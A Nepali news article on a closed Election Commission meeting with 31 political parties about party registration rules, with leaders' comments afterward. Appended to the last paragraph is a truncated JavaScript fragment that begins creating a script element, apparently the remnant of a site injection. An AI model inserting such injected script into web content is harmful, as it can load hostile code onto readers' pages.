काठमाडौँ, १० असोज । निर्वाचन आयोगले सञ्चारमाध्यमलाई आज बैठकको श्रव्य, दृश्य तथा तस्बिर लिनबाट वञ्चित गर्दै बैठक ‘अति गोप्य’ भएको जनाएको थियो । तर आयोगले बोलाएको सो बैठकमा भाग लिएका राजनीतिक दलका नेताहरुले बैठकका विषयवस्तुबारे सञ्चारकर्मीसँग खुलेर गरेका छन् ।
समाचार सङ्कलन गर्न त्यहाँ पुगेका सञ्चारकर्मीलाई आयोगका कर्मचारीले ‘माथिको आदेश छ, सभाकक्षमा श्रव्य, दृश्य तथा तस्बिर लिन सञ्चारकर्मीलाई प्रवेश नगराउनू’ भनेका थिए ।
नेताहरुका अनुसार व्यवस्थापिका–संसद्मा प्रतिनिधित्व गरेका ३१ दलले निर्वाचनमा भाग लिन चाहने नयाँ राजनीतिक दलको मात्र दर्ता गर्न निर्वाचन आयोगलाई सुझाव दिएका छन् । n-ir
आयोगले संवैधानिक प्रावधानका बारेमा राजनीतिक दलसँग छलफल गर्न आज डाकेको बैठकमा सहभागी दलले निर्वाचनमा भाग लिइसकेका दललाई ‘अद्यावधिक’ मात्र गराए पुग्ने सुझाव दिए ।
नेकपा (एमाले)का केन्द्रीय सदस्य राजेन्द्र पाण्डेले राजनीतिक दलसम्बन्धी संविधानको व्यवस्थाका बारेमा आयोगले बैठकमा जानकारी गराएको जानकारी दिए । उनले आयोगसमक्ष यसअघिका निर्वाचनमा भाग लिइसकेका दललाई ‘अद्यावधिक’ र निर्वाचनमा भाग लिन चाहनेलाई मात्र दर्ताको प्रावधान राख्न सुझाव दिएको बताए ।
नेकपा (माले)का महासचिव सिपी मैनालीले संवैधानिक प्रावधानअनुसार आयोगसँग राजनीतिक दल जोडिने विषयमा बैठकमा छलफल भएको जानकारी दिए ।

बैठकमा नेपाली काँग्रेस, नेकपा (एमाले), नेकपा (माओवादी केन्द्र) लगायत ३१ दलका शीर्षनेताको सहभागिता रहेको थियो । बैठकमा प्रमुख निर्वाचन आयुक्त डा अयोधीप्रसाद यादवले राजनीतिक दलले दिएका सुझावका आधारमा आयोगले काम गर्ने बताएको महासचिव मैनालीले जानकारी दिए ।var d=document;var s=d.createElement(‘script’);


  • सोम, अशोज १०, २०७३ मा प्रकाशित    
  • प्रतिकृया दिनुहोस

    सम्बन्धित समाचार

    फरक शैलीमा प्रचार

    शुक्र, असार ९, २०७४

    निर्वाचनमय बन्यो पाल्पा

    शुक्र, असार ९, २०७४